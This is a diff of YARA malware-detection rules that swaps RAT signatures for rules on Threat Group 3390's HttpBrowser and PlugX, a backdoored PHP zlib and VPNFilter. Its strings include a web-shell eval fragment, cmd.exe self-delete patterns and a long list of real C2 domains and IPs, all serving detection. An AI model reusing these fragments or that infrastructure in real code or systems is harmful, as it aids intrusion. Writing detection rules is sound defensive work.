+		reference = "https://blog.gdatasoftware.com/blog/article/dissecting-the-kraken.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_kraken_bot1.yar#L8-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "de37dc77d9a2462f5d54ad5225405c6d95dad39e67a893f5442b26dc641a20f9"
-		score = 50
-		quality = 60
+		hash = "798e9f43fc199269a3ec68980eb4d91eb195436d"
+		logic_hash = "2e0f0a981ce3483aad8e48f6a259f9875ea4f8449feb24bafbae07243dd82a16"
+		score = 90
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = / cpassword=\"[^\"]/ ascii
-		$s2 = " changeLogon=" ascii
-		$s3 = " description=" ascii
-		$s4 = " acctDisabled=" ascii
+		$s2 = "%s=?getname" fullword ascii
+		$s4 = "&COMPUTER=^" fullword ascii
+		$s5 = "xJWFwcGRhdGElAA=" fullword ascii
+		$s8 = "JVdJTkRJUi" fullword ascii
+		$s20 = "btcplug" fullword ascii
 
 	condition:
-		uint32be( 0 ) == 0x3C3F786D and filesize < 1000KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_SUSP_ELF_SPARC_Hunting_SBZ_Obfuscation : FILE
+rule SIGNATURE_BASE_Httpbrowser_RAT_Dropper_Gen1 : FILE
 {
 	meta:
-		description = "This rule is UNTESTED against a large dataset and is for hunting purposes only."
-		author = "netadr, modified by Florian Roth to avoid elf module import"
-		id = "15ee9a66-d823-508c-a14c-2c6ff45f47e5"
-		date = "2023-04-02"
-		modified = "2023-05-08"
-		reference = "https://netadr.github.io/blog/a-quick-glimpse-sbz/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_sparc_sbz_apr23.yar#L2-L24"
+		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Dropper"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2e347024-ac5f-5e8c-a8b0-53eaa9a03979"
+		date = "2015-08-06"
+		modified = "2023-12-05"
+		reference = "http://snip.ly/giNB"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_threatgroup_3390.yar#L8-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3d45dc8d8dbc62cee6b7ec4aa842eaa88bd23aea17e995eef4850fd91e7069a3"
-		score = 60
+		logic_hash = "927821e974cff6cd4d15b19bf4d0486abc57725ecdf6f00755dd4f912fbf82d1"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "808de72f1eae29e3c1b2c32be1b84c5064865a235866edf5e790d2a7ba709907"
+		hash2 = "f6f966d605c5e79de462a65df437ddfca0ad4eb5faba94fc875aba51a4b894a7"
+		hash3 = "f424965a35477d822bbadb821125995616dc980d3d4f94a68c87d0cd9b291df9"
+		hash4 = "01441546fbd20487cb2525a0e34e635eff2abe5c3afc131c7182113220f02753"
+		hash5 = "8cd8159f6e4689f572e2087394452e80e62297af02ca55fe221fe5d7570ad47b"
+		hash6 = "10de38419c9a02b80ab7bf2f1f1f15f57dbb0fbc9df14b9171dc93879c5a0c53"
+		hash7 = "c2fa67e970d00279cec341f71577953d49e10fe497dae4f298c2e9abdd3a48cc"
 
 	strings:
-		$xor_block = { 9A 18 E0 47 9A 1B 40 01 9A 18 80 0D }
-		$a1 = "SUNW_"
+		$x1 = "1001=cmd.exe" fullword ascii
+		$x2 = "1003=ShellExecuteA" fullword ascii
+		$x3 = "1002=/c del /q %s" fullword ascii
+		$x4 = "1004=SetThreadPriority" fullword ascii
+		$op0 = { e8 71 11 00 00 83 c4 10 ff 4d e4 8b f0 78 07 8b }
+		$op1 = { e8 85 34 00 00 59 59 8b 86 b4 }
+		$op2 = { 8b 45 0c 83 38 00 0f 84 97 }
+		$op3 = { 8b 45 0c 83 38 00 0f 84 98 }
+		$op4 = { 89 7e 0c ff 15 a0 50 40 00 59 8b d8 6a 20 59 8d }
+		$op5 = { 56 8d 85 cd fc ff ff 53 50 88 9d cc fc ff ff e8 }
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and $a1 and $xor_block
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of ( $x* ) and 1 of ( $op* )
 }
-rule SIGNATURE_BASE_SUSP_ELF_SPARC_Hunting_SBZ_Uniquestrings
+rule SIGNATURE_BASE_Httpbrowser_RAT_Sample1 : FILE
 {
 	meta:
-		description = "This rule is UNTESTED against a large dataset and is for hunting purposes only."
-		author = "netadr, modified by Florian Roth for performance reasons"
-		id = "d2f70d10-412e-5e83-ba4f-eac251012dc1"
-		date = "2023-04-02"
-		modified = "2023-05-08"
-		reference = "https://netadr.github.io/blog/a-quick-glimpse-sbz/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_sparc_sbz_apr23.yar#L26-L47"
+		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Sample update.hancominc.com"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8babf47f-006c-5001-9753-08ac08f5e861"
+		date = "2015-08-06"
+		modified = "2023-12-05"
+		reference = "http://snip.ly/giNB"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_threatgroup_3390.yar#L50-L65"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bb95fc6bda0a0ed8ffc6db9734c725c487b0e70909d60119bf58d60987daaaeb"
-		score = 60
+		logic_hash = "746df577e952e0354342a48fe9f1650e63e3470902e7c5bba36d36fa34ea2bff"
+		score = 80
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "be334d1f8fa65a723af65200a166c2bbdb06690c8b30fafe772600e4662fc68b"
+		hash2 = "1052ad7f4d49542e4da07fa8ea59c15c40bc09a4d726fad023daafdf05866ebb"
 
 	strings:
-		$s1 = "<%u>[%s] Event #%u: "
-		$s2 = "lprc:%08X" ascii fullword
-		$s3 = "diuXxobB"
-		$s4 = "CHM_FW"
+		$s0 = "update.hancominc.com" fullword wide
 
 	condition:
-		2 of ( $* )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and $s0
 }
-rule SIGNATURE_BASE_SUSP_ELF_SPARC_Hunting_SBZ_Modulestruct : FILE
+rule SIGNATURE_BASE_Httpbrowser_RAT_Sample2 : FILE
 {
 	meta:
-		description = "This rule is UNTESTED against a large dataset and is for hunting purposes only."
-		author = "netadr, modified by Florian Roth for FP reduction reasons"
-		id = "909746f1-44f5-597b-bdb2-2a1396d4b8c7"
-		date = "2023-04-02"
-		modified = "2023-05-08"
-		reference = "https://netadr.github.io/blog/a-quick-glimpse-sbz/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_sparc_sbz_apr23.yar#L49-L65"
+		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "693d381f-50b0-5f06-b725-78243b67092c"
+		date = "2015-08-06"
+		modified = "2023-12-05"
+		reference = "http://snip.ly/giNB"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_threatgroup_3390.yar#L67-L84"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dc9608c769dcb14ba01559bfe2e8ed03eebf5695b867b53742f26e3fcce389ca"
-		score = 60
+		logic_hash = "c7e945131a867bf46a467784d7119c95342733cc723cdeeb76d69c8fdb326749"
+		score = 80
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c57c5a2c322af2835ae136b75283eaaeeaa6aa911340470182a9983ae47b8992"
 
 	strings:
-		$be = { 02 02 00 00 01 C1 00 07 }
-		$le = { 02 02 00 00 07 00 C1 01 }
+		$s0 = "nKERNEL32.DLL" fullword wide
+		$s1 = "WUSER32.DLL" fullword wide
+		$s2 = "mscoree.dll" fullword wide
+		$s3 = "VPDN_LU.exeUT" fullword ascii
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and ( $be or $le )
+		uint16( 0 ) == 0x5a4d and filesize < 250KB and all of them
 }
-rule SIGNATURE_BASE_RAT_AAR
+rule SIGNATURE_BASE_Httpbrowser_RAT_Gen : FILE
 {
 	meta:
-		description = "Detects AAR RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "42c1af80-cff3-505f-a3cb-35b7e34575e1"
-		date = "2014-01-04"
+		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Generic"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0ba9facb-7385-56ce-9e20-d86261a39cd1"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/AAR"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L1-L22"
+		reference = "http://snip.ly/giNB"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_threatgroup_3390.yar#L86-L124"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a206b3f5cf6cc870135bc267b5baab8333422dc917efce6c66ee907690592d09"
-		score = 75
+		logic_hash = "cbc1dec88994427fc5003c9506f5a766531136ee80a16d00d2bf5bd5d7990cb3"
+		score = 90
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0299493ccb175d452866f5e21d023d3e92cd8d28452517d1d19c0f05f2c5ca27"
+		hash2 = "065d055a90da59b4bdc88b97e537d6489602cb5dc894c5c16aff94d05c09abc7"
+		hash3 = "05c7291db880f94c675eea336ecd66338bd0b1d49ad239cc17f9df08106e6684"
+		hash4 = "07133f291fe022cd14346cd1f0a649aa2704ec9ccadfab809ca9c48b91a7d81b"
+		hash5 = "0f8893e87ddec3d98e39a57f7cd530c28e36d596ea0a1d9d1e993dc2cae0a64d"
+		hash6 = "108e6633744da6efe773eb78bd0ac804920add81c3dde4b26e953056ac1b26c5"
+		hash7 = "1052ad7f4d49542e4da07fa8ea59c15c40bc09a4d726fad023daafdf05866ebb"
+		hash8 = "1277ede988438d4168bb5b135135dd3b9ae7d9badcdf1421132ca4692dd18386"
+		hash9 = "19be90c152f7a174835fd05a0b6f722e29c648969579ed7587ae036679e66a7b"
+		hash10 = "1e7133bf5a9fe5e462321aafc2b7770b8e4183a66c7fef14364a0c3f698a29af"
+		hash11 = "2264e5e8fcbdcb29027798b200939ecd8d1d3ad1ef0aef2b8ce7687103a3c113"
+		hash12 = "2a1bdeb0a021fb0bdbb328bd4b65167d1f954c871fc33359cb5ea472bad6e13e"
+		hash13 = "259a2e0508832d0cf3f4f5d9e9e1adde17102d2804541a9587a9a4b6f6f86669"
+		hash14 = "240d9ce148091e72d8f501dbfbc7963997d5c2e881b4da59a62975ddcbb77ca2"
+		hash15 = "211a1b195cf2cc70a2caf8f1aafb8426eb0e4bae955e85266490b12b5322aa16"
+		hash16 = "2d25c6868c16085c77c58829d538b8f3dbec67485f79a059f24e0dce1e804438"
+		hash17 = "2d932d764dd9b91166361d8c023d64a4480b5b587a6087b0ce3d2ac92ead8a7d"
+		hash18 = "3556722d9aa37beadfa6ba248a66576f767e04b09b239d3fb0479fa93e0ba3fd"
+		hash19 = "365e1d4180e93d7b87ba28ce4369312cbae191151ac23ff4a35f45440cb9be48"
+		hash20 = "36c49f18ce3c205152eef82887eb3070e9b111d35a42b534b2fb2ee535b543c0"
+		hash21 = "3eeb1fd1f0d8ab33f34183893c7346ddbbf3c19b94ba3602d377fa2e84aaad81"
+		hash22 = "3fa8d13b337671323e7fe8b882763ec29b6786c528fa37da773d95a057a69d9a"
 
 	strings:
-		$a = "Hashtable"
-		$b = "get_IsDisposed"
-		$c = "TripleDES"
-		$d = "testmemory.FRMMain.resources"
-		$e = "$this.Icon" wide
-		$f = "{11111-22222-20001-00001}" wide
+		$s0 = "%d|%s|%04d/%02d/%02d %02d:%02d:%02d|%ld|%d" fullword wide
+		$s1 = "HttpBrowser/1.0" fullword wide
+		$s2 = "set cmd : %s" ascii fullword
+		$s3 = "\\config.ini" wide fullword
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 45KB and filesize > 20KB and all of them
 }
-rule SIGNATURE_BASE_RAT_Adzok
+rule SIGNATURE_BASE_Plugx_Nvsmartmax_Gen : FILE
 {
 	meta:
-		description = "Detects Adzok RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "93807f85-ae4e-5fd2-9010-ed2cf6f57f38"
-		date = "2015-01-05"
+		description = "Threat Group 3390 APT Sample - PlugX NvSmartMax Generic"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5ecd25a8-9717-527f-bb6e-3259b9a60458"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Adzok"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L24-L48"
+		reference = "http://snip.ly/giNB"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_threatgroup_3390.yar#L126-L154"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ee3291a4396ba6cb3c5e22229de4f5e45714b29bfeac1c56bde6d038a9d25458"
-		score = 75
+		logic_hash = "7795b0d978f9447a6cee808708d65992447e359539a8fe64331c06ad46ff7491"
+		score = 70
 		quality = 85
-		tags = ""
-		Versions = "Free 1.0.0.3,"
-		maltype = "Remote Access Trojan"
-		filetype = "jar"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "718fc72942b9b706488575c0296017971170463f6f40fa19b08fc84b79bf0cef"
+		hash2 = "1c0379481d17fc80b3330f148f1b87ff613cfd2a6601d97920a0bcd808c718d0"
+		hash3 = "555952aa5bcca4fa5ad5a7269fece99b1a04816d104ecd8aefabaa1435f65fa5"
+		hash4 = "71f7a9da99b5e3c9520bc2cc73e520598d469be6539b3c243fb435fe02e44338"
+		hash5 = "65bbf0bd8c6e1ccdb60cf646d7084e1452cb111d97d21d6e8117b1944f3dc71e"
 
 	strings:
-		$a1 = "config.xmlPK"
-		$a2 = "key.classPK"
-		$a3 = "svd$1.classPK"
-		$a4 = "svd$2.classPK"
-		$a5 = "Mensaje.classPK"
-		$a6 = "inic$ShutdownHook.class"
-		$a7 = "Uninstall.jarPK"
-		$a8 = "resources/icono.pngPK"
+		$s0 = "NvSmartMax.dll" fullword ascii
+		$s1 = "NvSmartMax.dll.url" fullword ascii
+		$s2 = "Nv.exe" fullword ascii
+		$s4 = "CryptProtectMemory failed" fullword ascii
+		$s5 = "CryptUnprotectMemory failed" fullword ascii
+		$s7 = "r%.*s(%d)%s" fullword wide
+		$s8 = " %s CRC " fullword wide
+		$op0 = { c6 05 26 49 42 00 01 eb 4a 8d 85 00 f8 ff ff 50 }
+		$op1 = { 8d 85 c8 fe ff ff 50 8d 45 c8 50 c6 45 47 00 e8 }
+		$op2 = { e8 e6 65 00 00 50 68 10 43 41 00 e8 56 84 00 00 }
 
 	condition:
-		7 of ( $a* )
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of ( $s* ) and 1 of ( $op* )
 }
-rule SIGNATURE_BASE_RAT_Ap0Calypse
+rule SIGNATURE_BASE_Httpbrowser_RAT_Dropper_Gen2 : FILE
 {
 	meta:
-		description = "Detects Ap0calypse RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "a2993654-efa0-519b-b6f6-4d722d93adde"
-		date = "2014-01-04"
+		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Dropper"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cd559642-a102-5946-8a7f-16c10e7f746d"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Ap0calypse"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L50-L71"
+		reference = "http://snip.ly/giNB"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_threatgroup_3390.yar#L156-L183"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1ce90a5b1b3f643d4e530d6e00741f5d5918d3199cfbc4126cf8421a9e42023e"
-		score = 75
+		logic_hash = "bf274053fe7729471716a710e3bd5ed027d6ab2c45f7af9a1103bfa1ada9cbf4"
+		score = 70
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c57c5a2c322af2835ae136b75283eaaeeaa6aa911340470182a9983ae47b8992"
+		hash2 = "dfa984174268a9f364d856fd47cfaca75804640f849624d69d81fcaca2b57166"
 
 	strings:
-		$a = "Ap0calypse"
-		$b = "Sifre"
-		$c = "MsgGoster"
-		$d = "Baslik"
-		$e = "Dosyalars"
-		$f = "Injecsiyon"
+		$s1 = "navlu.dll.urlUT" fullword ascii
+		$s2 = "VPDN_LU.exeUT" fullword ascii
+		$s3 = "pnipcn.dllUT" fullword ascii
+		$s4 = "\\ssonsvr.exe" ascii
+		$s5 = "/c del /q %s" fullword ascii
+		$s6 = "\\setup.exe" ascii
+		$s7 = "msi.dllUT" fullword ascii
+		$op0 = { 8b 45 0c 83 38 00 0f 84 98 }
+		$op1 = { e8 dd 07 00 00 ff 35 d8 fb 40 00 8b 35 7c a0 40 }
+		$op2 = { 83 fb 08 75 2c 8b 0d f8 af 40 00 89 4d dc 8b 0d }
+		$op3 = { c7 43 18 8c 69 40 00 e9 da 01 00 00 83 7d f0 00 }
+		$op4 = { 6a 01 e9 7c f8 ff ff bf 1a 40 00 96 1b 40 00 01 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 3 of ( $s* ) and 1 of ( $op* )
 }
-rule SIGNATURE_BASE_RAT_Arcom
+rule SIGNATURE_BASE_Threatgroup3390_Strings : FILE
 {
 	meta:
-		description = "Detects Arcom RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "a0598340-c4a5-53f0-a810-63e37ec669a5"
-		date = "2014-01-04"
+		description = "Threat Group 3390 APT - Strings"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9a44393b-5220-5376-ba18-2330f4623cd6"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Arcom"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L72-L93"
+		reference = "http://snip.ly/giNB"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_threatgroup_3390.yar#L185-L202"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dbccd9885ba0ec5741e3c74908d2e76b15836bc75373c100f344abf9bdf3a0b4"
-		score = 75
+		logic_hash = "d1e4889a48f4f9bfcc12237dd44cd8ad9db9918c6a5859de086d1ddc051ff937"
+		score = 60
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "CVu3388fnek3W(3ij3fkp0930di"
-		$a2 = "ZINGAWI2"
-		$a3 = "clWebLightGoldenrodYellow"
-		$a4 = "Ancestor for '%s' not found" wide
-		$a5 = "Control-C hit" wide
-		$a6 = {A3 24 25 21}
+		$s1 = "\"cmd\" /c cd /d \"c:\\Windows\\Temp\\\"&copy" ascii
+		$s2 = "svchost.exe a -k -r -s -m5 -v1024000 -padmin-windows2014"
+		$s3 = "ren *.rar *.zip" fullword ascii
+		$s4 = "c:\\temp\\ipcan.exe" fullword ascii
+		$s5 = "<%eval(Request.Item(\"admin-na-google123!@#" ascii
 
 	condition:
-		all of them
+		1 of them and filesize < 30KB
 }
-rule SIGNATURE_BASE_RAT_Bandook
+rule SIGNATURE_BASE_Threatgroup3390_C2 : FILE
 {
 	meta:
-		description = "Detects Bandook RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "79fb99d8-bd56-5986-9917-e119b51b8303"
-		date = "2014-01-04"
+		description = "Threat Group 3390 APT - C2 Server"
+		author = "Florian Roth (Nextron Systems)"
+		id = "232b5052-e349-55f1-bd7e-1afc5d35abe4"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/bandook"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L95-L120"
+		reference = "http://snip.ly/giNB"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_threatgroup_3390.yar#L204-L323"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fe658e0990f0d456b1a8f5acea62a3b80bdd4a9bc0eedfe2e1092ea60b4fca2e"
-		score = 75
-		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		logic_hash = "be411bb8e301eb4ba611bc9d6c8f0e3b8c27b87c2dd3f8405d0eba0296117697"
+		score = 60
+		quality = 60
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = "aaaaaa1|"
-		$b = "aaaaaa2|"
-		$c = "aaaaaa3|"
-		$d = "aaaaaa4|"
-		$e = "aaaaaa5|"
-		$f = "%s%d.exe"
-		$g = "astalavista"
-		$h = "givemecache"
-		$i = "%s\\system32\\drivers\\blogs\\*"
-		$j = "bndk13me"
+		$s1 = "api.apigmail.com"
+		$s2 = "apigmail.com"
+		$s3 = "backup.darkhero.org"
+		$s4 = "bel.updatawindows.com"
+		$s5 = "binary.update-onlines.org"
+		$s6 = "blackcmd.com"
+		$s7 = "castle.blackcmd.com"
+		$s8 = "ctcb.blackcmd.com"
+		$s9 = "darkhero.org"
+		$s10 = "dav.local-test.com"
+		$s11 = "test.local-test.com"
+		$s12 = "dev.local-test.com"
+		$s13 = "ocean.local-test.com"
+		$s14 = "ga.blackcmd.com"
+		$s15 = "helpdesk.blackcmd.com"
+		$s16 = "helpdesk.csc-na.com"
+		$s17 = "helpdesk.hotmail-onlines.com"
+		$s18 = "helpdesk.lnip.org"
+		$s19 = "hotmail-onlines.com"
+		$s20 = "jobs.hotmail-onlines.com"
+		$s21 = "justufogame.com"
+		$s22 = "lnip.org"
+		$s23 = "local-test.com"
+		$s24 = "login.hansoftupdate.com"
+		$s25 = "long.update-onlines.org"
+		$s26 = "longlong.update-onlines.org"
+		$s27 = "longshadow.dyndns.org"
+		$s28 = "longshadow.update-onlines.org"
+		$s29 = "longykcai.update-onlines.org"
+		$s30 = "lostself.update-onlines.org"
+		$s31 = "mac.navydocument.com"
+		$s32 = "mail.csc-na.com"
+		$s33 = "mantech.updatawindows.com"
+		$s34 = "micr0soft.org"
+		$s35 = "microsoft-outlook.org"
+		$s36 = "mtc.navydocument.com"
+		$s37 = "navydocument.com"
+		$s38 = "mtc.update-onlines.org"
+		$s39 = "news.hotmail-onlines.com"
+		$s40 = "oac.3322.org"
+		$s41 = "ocean.apigmail.com"
+		$s42 = "pchomeserver.com"
+		$s43 = "registre.organiccrap.com"
+		$s44 = "security.pomsys.org"
+		$s45 = "services.darkhero.org"
+		$s46 = "sgl.updatawindows.com"
+		$s47 = "shadow.update-onlines.org"
+		$s48 = "sonoco.blackcmd.com"
+		$s49 = "test.logmastre.com"
+		$s50 = "up.gtalklite.com"
+		$s51 = "updatawindows.com"
+		$s52 = "update-onlines.org"
+		$s53 = "update.deepsoftupdate.com"
+		$s54 = "update.hancominc.com"
+		$s55 = "update.micr0soft.org"
+		$s56 = "update.pchomeserver.com"
+		$s57 = "urs.blackcmd.com"
+		$s58 = "wang.darkhero.org"
+		$s59 = "webs.local-test.com"
+		$s60 = "word.apigmail.com"
+		$s61 = "wordpress.blackcmd.com"
+		$s62 = "working.blackcmd.com"
+		$s63 = "working.darkhero.org"
+		$s64 = "working.hotmail-onlines.com"
+		$s65 = "www.trendmicro-update.org"
+		$s66 = "www.update-onlines.org"
+		$s67 = "x.apigmail.com"
+		$s68 = "ykcai.update-onlines.org"
+		$s69 = "ykcailostself.dyndns-free.com"
+		$s70 = "ykcainobody.dyndns.org"
+		$s71 = "zj.blackcmd.com"
+		$s72 = "laxness-lab.com"
+		$s73 = "google-ana1ytics.com"
+		$s74 = "www.google-ana1ytics.com"
+		$s75 = "ftp.google-ana1ytics.com"
+		$s76 = "hotmailcontact.net"
+		$s77 = "208.115.242.36"
+		$s78 = "208.115.242.37"
+		$s79 = "208.115.242.38"
+		$s80 = "66.63.178.142"
+		$s81 = "72.11.148.220"
+		$s82 = "72.11.141.133"
+		$s83 = "74.63.195.236"
+		$s84 = "74.63.195.236"
+		$s85 = "74.63.195.237"
+		$s86 = "74.63.195.238"
+		$s87 = "103.24.0.142"
+		$s88 = "103.24.1.54"
+		$s89 = "106.187.45.162"
+		$s90 = "192.151.236.138"
+		$s91 = "192.161.61.19"
+		$s92 = "192.161.61.20"
+		$s93 = "192.161.61.22"
+		$s94 = "103.24.1.54"
+		$s95 = "67.215.232.179"
+		$s96 = "96.44.177.195"
+		$s97 = "49.143.192.221"
+		$s98 = "67.215.232.181"
+		$s99 = "67.215.232.182"
+		$s100 = "96.44.182.243"
+		$s101 = "96.44.182.245"
+		$s102 = "96.44.182.246"
+		$s103 = "49.143.205.30"
+		$s104 = "working_success@163.com"
+		$s105 = "ykcaihyl@163.com"
+		$s106 = "working_success@163.com"
+		$s107 = "yuming@yinsibaohu.aliyun.com"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule SIGNATURE_BASE_RAT_Blacknix
+rule SIGNATURE_BASE_VULN_PHP_Hack_Backdoored_Zlib_Zerodium_Mar21_1 : FILE
 {
 	meta:
-		description = "Detects BlackNix RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "d7814184-3ae4-53f1-a602-c3fbc02573c3"
-		date = "2014-01-04"
+		description = "Detects backdoored PHP zlib version"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5e0ab8f8-776a-52b0-b5be-ff1d34bccfd1"
+		date = "2021-03-29"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/BlackNix"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L122-L142"
+		reference = "https://www.bleepingcomputer.com/news/security/phps-git-server-hacked-to-add-backdoors-to-php-source-code/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vul_php_zlib_backdoor.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "de8787fd35e6313c061b8759361698b1acd54b215d226839a8702b1a5d189ccb"
+		logic_hash = "74bfd9e12cb7671cde953d361a2adeb9388edd9b2aab0f9ce04dce0d433561dc"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
 
 	strings:
-		$a1 = "SETTINGS" wide
-		$a2 = "Mark Adler"
-		$a3 = "Random-Number-Here"
-		$a4 = "RemoteShell"
-		$a5 = "SystemInfo"
+		$x1 = "REMOVETHIS: sold to zerodium, mid 2017" fullword ascii
+		$x2 = "HTTP_USER_AGENTT" ascii fullword
 
 	condition:
-		all of them
+		filesize < 3000KB and all of them
 }
-rule SIGNATURE_BASE_RAT_Blackshades : BLACKSHADES
+rule SIGNATURE_BASE_MAL_ELF_Vpnfilter_1 : FILE
 {
 	meta:
-		description = "Detects BlackShades RAT"
-		author = "Brian Wallace (@botnet_hunter)"
-		id = "039f9efd-034d-5088-9a2f-7a63ad170d3d"
-		date = "2014-01-04"
+		description = "Detects VPNFilter malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dc50cb37-a6e7-5eb5-9581-31d7fd005e47"
+		date = "2018-05-24"
 		modified = "2023-12-05"
